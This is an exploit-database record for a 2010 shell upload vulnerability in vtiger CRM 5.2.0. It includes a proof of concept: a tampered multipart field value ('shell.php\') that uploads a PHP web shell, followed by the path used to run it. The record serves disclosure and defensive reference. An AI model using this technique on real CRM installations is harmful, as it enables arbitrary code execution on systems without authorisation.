ID
VAR-E-201005-0965
TITLE
vtiger CRM 5.2.0 Shell Upload
Trust: 0.5
DESCRIPTION
vtiger CRM version 5.2.0 suffers from a shell upload vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | vtiger | model: | crm | scope: | eq | version: | 5.2.0 | Trust: 0.5 |
EXPLOIT
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Shell Upload #
# Software.................vtiger CRM 5.2.0 #
# Download.................http://sourceforge.net/projects/vtigercrm/files/ #
# Date.....................5/21/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A shell upload vunlerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP. #
# #
# #
# ##Exploit## #
# #
# Upload a PHP file and append a backslash to the filename_hidden value. #
# #
# #
# ##Proof of Concept## #
# #
# 1) Login and navigate to http://localhost/index.php?action=upload&module=uploads #
# #
# 2) Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit #
# it. e.g. #
# #
# ------WebKitFormBoundaryihWhA69lH4hKrGBy #
# Content-Disposition: form-data; name="filename_hidden" #
# #
# shell.php\ #
# #
# 3) Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g. #
# http://localhost/storage/2010/May/week3/shell.php #
# #
#============================================================================================================#
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
EXPLOIT LANGUAGE
shell
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | shell | Trust: 0.5 |
CREDITS
AutoSec Tools
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 89823 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 89823 |
LAST UPDATE DATE
2022-07-27T10:03:46.733000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 89823 | date: | 2010-05-22T19:04:01 |